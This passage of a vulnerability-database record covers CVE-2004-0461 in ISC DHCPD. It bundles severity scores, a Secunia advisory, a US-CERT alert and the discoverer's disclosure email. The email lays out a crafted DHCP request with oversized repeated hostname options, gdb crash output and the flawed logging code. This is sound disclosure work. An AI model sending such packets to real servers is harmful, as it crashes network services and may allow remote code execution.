"model": "dns one appliance .0-8a",
"scope": "eq",
"trust": 0.3,
"vendor": "infoblox",
"version": "2.4"
},
{
"model": "dns one appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "infoblox",
"version": "2.4.0-8"
},
{
"model": "dns one appliance -r5",
"scope": "eq",
"trust": 0.3,
"vendor": "infoblox",
"version": "2.3.1"
},
{
"model": "dhcpd rc14",
"scope": "ne",
"trust": 0.3,
"vendor": "isc",
"version": "3.0.1"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:isc:dhcp",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Gregory Duchemin\u203b c3rb3r@hotmail.com\u203bSolar Designer\u203b solar@openwall.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0461",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2004-0461",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-8891",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2004-0461",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#317350",
"trust": 0.8,
"value": "25.52"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#654390",
"trust": 0.8,
"value": "14.21"
},
{
"author": "NVD",
"id": "CVE-2004-0461",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200408-117",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-8891",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The DHCP daemon (DHCPD) for ISC DHCP 3.0.1rc12 and 3.0.1rc13, when compiled in environments that do not provide the vsnprintf function, uses C include files that define vsnprintf to use the less safe vsprintf function, which can lead to buffer overflow vulnerabilities that enable a denial of service (server crash) and possibly execute arbitrary code. The Internet Systems Consortium\u0027s (ISC) Dynamic Host Configuration Protocol (DHCP) 3 application contains a buffer overflow vulnerability. As a result, you may gain administrative privileges on vulnerable systems. \nOn systems which lack the vsnprintf() library call, ISC DHCPD defines vsnprintf as:\n#define vsnprintf(buf, size, fmt, list) vsprintf (buf, fmt, list)\nThis definition discards the size argument to the function, potentially allowing any occurrence of vsnprintf() to be exploitable, by overflowing whatever intended buffer is passed to the library call. \nOther locations in DHCPD utilizing this function may be exploitable. \nThis issue is reported to affect ISC DHCPD versions 3.0.1rc12 and 3.0.1rc13. ISC DHCP calls vsnprintf() to write format log file strings. \n\n----------------------------------------------------------------------\n\nSecunia is proud to announce the availability of the Secunia Software\nInspector. \n\nThe Secunia Software Inspector is a free service that detects insecure\nversions of software that you may have installed in your system. When\ninsecure versions are detected, the Secunia Software Inspector also\nprovides thorough guidelines for updating the software to the latest\nsecure version from the vendor. \n\nTry it out online:\nhttp://secunia.com/software_inspector/\n\n----------------------------------------------------------------------\n\nTITLE:\nXEROX WorkCentre Products Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA23265\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/23265/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSecurity Bypass, Manipulation of data, Exposure of system\ninformation, Exposure of sensitive information, DoS, System access\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nXerox WorkCentre\nhttp://secunia.com/product/4746/\nXerox WorkCentre Pro\nhttp://secunia.com/product/4553/\n\nDESCRIPTION:\nSome vulnerabilities and weaknesses have been reported in various\nXEROX WorkCentre products, which can be exploited by malicious people\nto bypass certain security restrictions, expose certain sensitive\ninformation, cause a DoS (Denial of Service), and compromise a\nvulnerable system. \n\n1) Input passed to the TCP/IP hostname, the Scan-to-mailbox folder\nname field, and to the Microsoft Network configuration parameters in\nthe Web User interface is not properly sanitised. \n\n2) Certain browser settings may allow unauthorized access. \nAdditionally, an unspecified vulnerability in the Web User Interface\ncan be exploited to bypass the authentication. \n\n3) The TFTP/BOOTP auto configuration can be exploited to manipulate\ncertain configuration settings. \n\n4) An unspecified error within the handling of email signatures can\nbe exploited to display improper items. \n\n5) Requests to web services can be made through HTTP instead of\nHTTPS. Other unspecified HTTP security issues and a httpd.conf\nmisconfiguration are also reported. \n\n6) An error within the Scan-to-mailbox feature can be exploited to\nanonymously download secure files. Additionally, it is possible to\nanonymously download audit log files. \n\n7) The system fails to keep accurate time resulting in incorrect time\nstamps in audit logs. \n\n8) The embedded Samba version contains various vulnerabilities. \nAdditionally, the SMB \"Homes\" share is visible and it\u0027s possible to\nbrowse the file system via SMB. \n\n9) The SNMP agent does not return errors for non-writable objects. \nAdditionally, authentication failure traps can\u0027t be enabled or\ngenerated. \n\n10) An error within ops3-dmn can be exploited to crash the service\nand cause a DoS by attaching a PS script. \n\n11) It is possible to bypass the security restriction and boot\nAlchemy by e.g. using an USB thumb drive. \n\n12) The \"Validate Repository SSL Certificate\" scan feature does not\nverify the FQDN. \n\n13) Certain problems with the Immediate Image Overwrite and On Demand\nImage Overwrite, a Postgress port block, and a http TRACE XSS attack\nin the network controller are reported. \n\n14) Two boundary errors within the embedded DHCP implementation can\nbe exploited to cause a buffer overflow, which may allow execution of\narbitrary code. \n\nSOLUTION:\nApply updated software (see vendor advisories for detailed\ninstructions). \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nXerox:\nhttp://www.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1b.pdf\nhttp://www.xerox.com/downloads/usa/en/c/cert_XRX06_004_v11.pdf\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n Technical Cyber Security Alert TA04-174A\n Multiple Vulnerabilities in ISC DHCP 3\n\n Original release date: June 22, 2004\n Last revised: --\n Source: US-CERT\n\nSystems Affected\n\n * ISC DHCP versions 3.0.1rc12 and 3.0.1rc13\n\nOverview\n\n Two vulnerabilities in the ISC DHCP allow a remote attacker to cause a\n denial of the DHCP service on a vulnerable system. It may be possible\n to exploit these vulnerabilities to execute arbitrary code on the\n system. \n\nI. \n\n VU#317350 discusses a buffer overflow vulnerability in the temporary\n storage of log lines. In transactions, ISC DHCPD logs every DHCP\n packet along with several pieces of descriptive information. The\n client\u0027s DISCOVER and the resulting OFFER, REQUEST, ACK, and NAKs are\n all logged. In all of these messages, if the client supplied a\n hostname, then it is also included in the logged line. As part of the\n DHCP datagram format, a client may specify multiple hostname options,\n up to 255 bytes per option. These options are concatenated by the\n server. If the hostname and options contain only ASCII characters,\n then the string will pass non-ASCII character filters and be\n temporarily stored in 1024 byte fixed-length buffers on the stack. If\n a client supplies enough hostname options, it is possible to overflow\n the fixed-length buffer. \n\n VU#654390 discusses C include files for systems that do not support\n the bounds checking vsnprintf() function. These files define the\n bounds checking vsnprintf() to the non-bounds checking vsprintf()\n function. Since vsprintf() is a function that does not check bounds,\n the size is discarded, creating the potential for a buffer overflow\n when client data is supplied. Note that the vsnprintf() statements are\n defined after the vulnerable code that is discussed in VU#317350. \n Since the preconditions for this vulnerability are similar to those\n required to exploit VU#317350, these buffer overflow conditions occur\n sequentially in the code after the buffer overflow vulnerability\n discussed in VU#317350, and these issues were discovered and resolved\n at the same time, there is no known exploit path to exploit these\n buffer overflow conditions caused by VU#654390. Note that VU#654390\n was discovered and exploitable once VU#317350 was resolved. \n\n For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP\n 3.0.1rc13 are believed to be vulnerable. VU#317350 is exploitable for\n all operating systems and configurations. VU#654390 is only defined\n for the following operating systems:\n\n * AIX\n * AlphaOS\n * Cygwin32\n * HP-UX\n * Irix\n * Linux\n * NextStep\n * SCO\n * SunOS 4\n * SunOS 5.5\n * Ultrix\n\n All versions of ISC DCHP 3, including all snapshots, betas, and\n release candidates, contain the flawed code. \n\n US-CERT is tracking these issues as VU#317350, which has been assigned\n CVE CAN-2004-0460, and VU#654390, which has been assigned CVE\n CAN-2004-0461. \n\nII. \n\nIII. Solution\n\n Apply patches or upgrade\n\n These issues have been resolved in ISC DHCP 3.0.1rc14. Your vendor may\n provide specific patches or updates. For vendor-specific information,\n please see your vendor\u0027s site, or look for your vendor infomation in\n VU#317350 and VU#654390. As vendors report new information to US-CERT,\n we will update the vulnerability notes. \n\nAppendix B. References\n\n * http://www.isc.org/sw/dhcp/\n * http://www.kb.cert.org/vuls/id/317350\n * http://www.kb.cert.org/vuls/id/654390\n _________________________________________________________________\n\n US-CERT thanks Gregory Duchemin and Solar Designer for discovering,\n reporting, and resolving this vulnerability. Thanks also to David\n Hankins of ISC for notifying us of this vulnerability and the\n technical information provided to create this document. \n _________________________________________________________________\n\n Feedback can be directed to the author: Jason A. Rafail\n _________________________________________________________________\n\n The latest version of this document can be found at:\n \n \u003chttp://www.us-cert.gov/cas/techalerts/TA04-174A.html\u003e\n _________________________________________________________________\n \n Copyright 2004 Carnegie Mellon University. \n \n Terms of use:\n \n \u003chttp://www.us-cert.gov/legal.html\u003e\n \n _________________________________________________________________\n\n Revision History\n\n June 22, 2004: Initial release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niD8DBQFA2HFSXlvNRxAkFWARArH4AKDtUECQTE5HXmvsDQkwcWn9r7uAowCdGTHq\nAqWt3CgdEPJcIFDbJlIWQHo=\n=HSxN\n-----END PGP SIGNATURE-----\n. Hi,\nfor those interested to reproduce the recent DOS attacks against ISC \nDHCPD 3.0.1 rc12 and rc13\nas described in:\nhttp://www.kb.cert.org/vuls/id/317350\n, i\u0027m forwarding the first email i sent to ISC describing several stack \nbased buffer overflows occuring during the creation\nof log messages and triggered by sending several DHCP HOSTNAME options \nwithin a single request. \nThis mail also includes a trace of such DHCP REQUEST. \n\nOther .bss overflows related to vsnprintf and identified later during \nour investigations as described in:\nhttp://www.kb.cert.org/vuls/id/654390\ncan be triggered the exact same way. \nNote that the home made tool i am referencing in this email will be made \navailable very soon and already includes ISC, INFOBLOX and DLINK dhcp \nvulnerabilities\nI will drop a note here when it is finally released. \ncheers,\nGregory\n\nSpecial thanks to Solar Designer and David W.Hankins (ISC)\n\n\n--- Original email ------\n\nSummary:\n\ni have discovered several stack based overflow in your dhcp-3.0.1rc12 \nand rc13 (may be others, have not checked)\nthese vulnerabilities can be easily triggered by crafting a dhcp \ndiscover or request packet which carries several hostname dhcp options that\n,once reassembled by the daemon (as explained in rfc 3396), overflow a \nstack based variable causing the daemon to crash. \nI believe than one might execute code remotely on the server with the \nsame user account dhcpd is running with, root in most cases. \nI have been able at some points during the tests, to control eip\u0027 4 \nbytes (intel 32bits arch), it was during the ddns forward update operation. \nNote that all tests have been made on a linux 2.4.20-24.9 using a home \nmade tool to generate custom dhcp traffic\n\nNow an example:\n\nsee dhcpd.conf in attachment if you need it. \n\nstructure of an offending packet (case of a dhcp request based attack)\n\n \u003e\u003e DHCP request\n \u003e\u003e from 0.0.0.0:68 (ff:ff:ff:ff:ff:ff) to 255.255.255.255:67 \n(ff:ff:ff:ff:ff:ff)\n\n \u003e\u003e op : BOOT REQUEST (1)\n \u003e\u003e htype : Ethernet (10Mb) (1)\n \u003e\u003e hlen : 6\n \u003e\u003e hops : 0\n \u003e\u003e xid : 0x00000000\n \u003e\u003e secs : 1\n \u003e\u003e flags : UNICAST (0x0000)\n \u003e\u003e ciaddr : 0.0.0.0\n \u003e\u003e yiaddr : 0.0.0.0\n \u003e\u003e siaddr : 255.255.255.255\n \u003e\u003e giaddr : 0.0.0.0\n \u003e\u003e chaddr : ff:ff:ff:ff:ff:ff\n \u003e\u003e sname :\n \u003e\u003e file :\n \u003e\u003e cookie : 0x63825363 (RFC 1497/2132, BOOTP Vendor informations/DHCP \noptions)\n \u003e\u003e DHCP option (053 [0x35]) : MESSAGE_TYPE : REQUEST\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e DHCP option (050 [0x32]) : REQUEST_IP : 192.168.0.99\n \nsending this packet to the ptraced daemon (within gdb) gives:\n\n(gdb) run -f -d\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y\nStarting program: /usr/sbin/dhcpd -f -d\nInternet Software Consortium DHCP Server V3.0.1rc13\nCopyright 1995-2003 Internet Software Consortium. \nAll rights reserved. \nFor info, please visit http://www.isc.org/products/DHCP\nWrote 0 deleted host decls to leases file. \nWrote 0 new dynamic host decls to leases file. \nWrote 0 leases to leases file. \nListening on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24\nSending on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24\nSending on Socket/fallback/fallback-net\nUnable to add forward map from \nbobAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-1022AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8 \n860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-284AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1. \n92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X \n1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1. \n\nProgram received signal SIGSEGV, Segmentation fault. \n0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, \nname=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n at hash.c:363\n363 hashno = (*table -\u003e do_hash) (name, len, table -\u003e \nhash_count);\n(gdb)\n \n\nbacktracing stack show:\n\n(gdb) bt\n#0 0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, \nname=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n at hash.c:363\n#1 0x0806fb0a in lease_hash_lookup (ptr=0xbfffde24, table=0x38322d50, \nbuf=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n at mdb.c:2055\n#2 0x0806eb5b in find_lease_by_hw_addr (lp=0xbfffde24, hwaddr=0x8149dac \n\"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", hwlen=7, file=0x80bbe25 \"mdb.c\", line=1662)\n at mdb.c:1574\n#3 0x0806ee5f in hw_hash_add (lease=0x8149d30) at mdb.c:1661\n#4 0x0806d959 in supersede_lease (comp=0x8149d30, lease=0x811def8, \ncommit=1, propogate=1, pimmediate=1) at mdb.c:969\n#5 0x08050cb9 in ack_lease (packet=0x811d6e0, lease=0x8149d30, offer=5, \nwhen=0,\n msg=0xbfffdfd0 \"DHCPREQUEST for 192.168.0.99 from ff:ff:ff:ff:ff:ff \nvia eth0\", ms_nulltp=0) at dhcp.c:2227\n#6 0x0804d041 in dhcprequest (packet=0x811d6e0, ms_nulltp=0, \nip_lease=0x0) at dhcp.c:662\n#7 0x0804c37d in dhcp (packet=0x811d6e0) at dhcp.c:224\n#8 0x08088d9a in do_packet (interface=0x811d568, packet=0xbfffe580, \nlen=1430, from_port=17408, from=\n {len = 4, iabuf = \u0027\\0\u0027 \u003crepeats 15 times\u003e}, hfrom=0xbffff5b0) at \noptions.c:2237\n#9 0x08096718 in got_one (h=0x811d568) at discover.c:785\n#10 0x080a937e in omapi_one_dispatch (wo=0x0, t=0x0) at dispatch.c:418\n#11 0x0807cce3 in dispatch () at dispatch.c:103\n#12 0x0804add1 in main (argc=3, argv=0xbffff904, envp=0xbffff914) at \ndhcpd.c:614\n#13 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6\n(gdb)\n\nNote that the daemon may actually crash at a different location \ndepending of the first corrupted structure it meets and therefore,\nof the size of the malicious option sent, along with the context (type \nof packet, leases in use etc...)\n\n\nProblems in the source:\nI have spent quite some time to find out where the overflow actually \ntakes its roots, here are my findings:\n\nfile server/dhcp.c:\nfunction dhcprequest :\n\n char msgbuf [1024]; /* XXX */\n char *s;\n\n.... \n\n if (lease \u0026\u0026 lease -\u003e client_hostname \u0026\u0026\n db_printable (lease -\u003e client_hostname))\n s = lease -\u003e client_hostname;\n else\n s = (char *)0;\n\n\n...... \n\n sprintf (msgbuf, \"DHCPREQUEST for %s%s from %s %s%s%svia %s\",\n piaddr (cip), smbuf,\n (packet -\u003e raw -\u003e htype\n ? print_hw_addr (packet -\u003e raw -\u003e htype,\n packet -\u003e raw -\u003e hlen,\n packet -\u003e raw -\u003e chaddr)\n : (lease\n ? print_hex_1 (lease -\u003e uid_len, lease -\u003e uid,\n lease -\u003e uid_len)\n : \"\u003cno identifier\u003e\")),\n s ? \"(\" : \"\", s ? s : \"\", s ? \") \" : \"\",\n packet -\u003e raw -\u003e giaddr.s_addr\n ? inet_ntoa (packet -\u003e raw -\u003e giaddr)\n : packet -\u003e interface -\u003e name);\n\n\nTo summarize, s is referencing the 